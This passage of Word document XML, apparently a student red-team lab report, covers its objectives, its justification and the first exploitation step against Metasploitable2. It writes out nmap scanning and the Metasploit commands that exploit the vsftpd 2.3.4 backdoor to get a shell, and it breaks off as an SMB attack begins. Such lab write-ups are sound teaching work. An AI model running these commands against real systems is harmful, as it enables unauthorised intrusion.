    <w:p w14:paraId="5A7B7812" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Exploitation of at least one vulnerable service to gain initial access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBA2979" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Demonstration of access to an internal system using valid credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D5E61D" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Attempted or successful privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE9DA9A" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Identification and exfiltration of sensitive data from the target environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F74075C" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc228059723"/>
      <w:bookmarkStart w:id="90" w:name="_Toc228127140"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>4.5 Justification of Approach</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w14:paraId="114B1DDB" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The chosen method gave a preference to simplicity, reproducibility, and real-world attacks. Instead of using very advanced or sophisticated techniques, the engagement was geared towards illustrating the basic vulnerabilities like unprotected services, weak credentials, and monitoring controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C50E56" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Such methodology is representative of the real-world attack situations that have been witnessed in real-life breaches, and in most cases, the attackers tend to take advantage of simple security misconfigurations instead of advanced zero-day exploits. The analysis is further enhanced by mapping the attack into the MITRE ATT&amp;CK framework, as it offers a standardised representation of adversarial behaviour.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C3C06C" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Ping was used to check network connectivity between systems (see Appendix B).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB9DE80" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc228059724"/>
      <w:bookmarkStart w:id="92" w:name="_Toc228127141"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5. Attack Execution and Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w14:paraId="0499CA97" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The following section will show the step-by-step implementation of the red team engagement, where the attacker advanced through the various stages of the attack lifecycle. The evidence behind each stage is the list of commands performed and the results of the same.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFDC086" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc228059725"/>
      <w:bookmarkStart w:id="94" w:name="_Toc228127142"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>5.1 Exploit 1 — Web Server Compromise (Metasploitable2)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w14:paraId="13CF9AF7" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The attack was initiated by reconnaissance to determine active hosts and services in the network. Nmap was also used by the attacker to scan the Metasploitable2 system on a service scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E78B7BF" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Metasploitable_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182DCED7" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The scan showed the presence of several open ports, such as FTP service on port 21 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve"> version 2.3.4) that is known to have a backdoor vulnerability (OWASP Foundation, 2021).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3064C747" w14:textId="2F0AF449" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25DFE73F" wp14:editId="6F97D673">
            <wp:extent cx="4213860" cy="2659380"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="41941234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3860" cy="2659380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="253DB8F9"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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>: Nmap scan identifying open ports and vulnerable FTP service (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEDFB8D" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Source: By Author)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D83AED" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Based on this finding, the attacker utilised the Metasploit Framework to exploit the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19593C64" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0F6E74D7" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B850B8A" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A185FC8" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>set RHOSTS &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Metasploitable_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741F73C3" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>set LHOST &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Kali_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A9068F" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706D8C90" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The exploit successfully established a command shell session on the target system, providing the attacker with initial access (Rapid7, 2024).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B670D1" w14:textId="14DB41BA" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19B7276B" wp14:editId="5AFF7292">
            <wp:extent cx="4930140" cy="3421380"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="5472892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0140" cy="3421380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3312C92F"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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>: Metasploit framework loading in Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BCDFF2" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Source: By Author)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E838E1" w14:textId="7B853C34" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="226FEAF2" wp14:editId="1CAB87CB">
            <wp:extent cx="5730240" cy="1691640"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="15549979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1691640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DAF438"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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">: Searching exact name for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="37D7D213" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Source: By Author)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA2F28C" w14:textId="495E754C" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A950CCC" wp14:editId="6E8D9A1E">
            <wp:extent cx="5181600" cy="1234440"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="139829113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0" cy="1234440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3FE849"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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">:Successful exploitation of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> backdoor resulting in command shell access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BF0312" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Source: By Author)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E5BF7A" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>To verify system access, basic commands were executed on the compromised machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EF8190" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="264A4DC7" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B968451" w14:textId="22A408D9" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0318C182" wp14:editId="62D1B89B">
            <wp:extent cx="4762500" cy="1851660"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="911687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1851660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="285ED3AB"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6</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:Verification of shell access and system information on compromised web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EB2275" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Source: By Author)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F95CC74" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>This phase is evidence of effective initial access and execution, which is a severe breach of the externally facing system (Weidman, 2019).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D151D6" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc228059726"/>
      <w:bookmarkStart w:id="96" w:name="_Toc228127143"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>5.2 Exploit 2 — Windows System Access via SMB</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w14:paraId="393D5476" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>After accessing the system, the attacker redirected his attention to the internal Windows 7 system. A service scan was done to identify available services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DE04EB" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
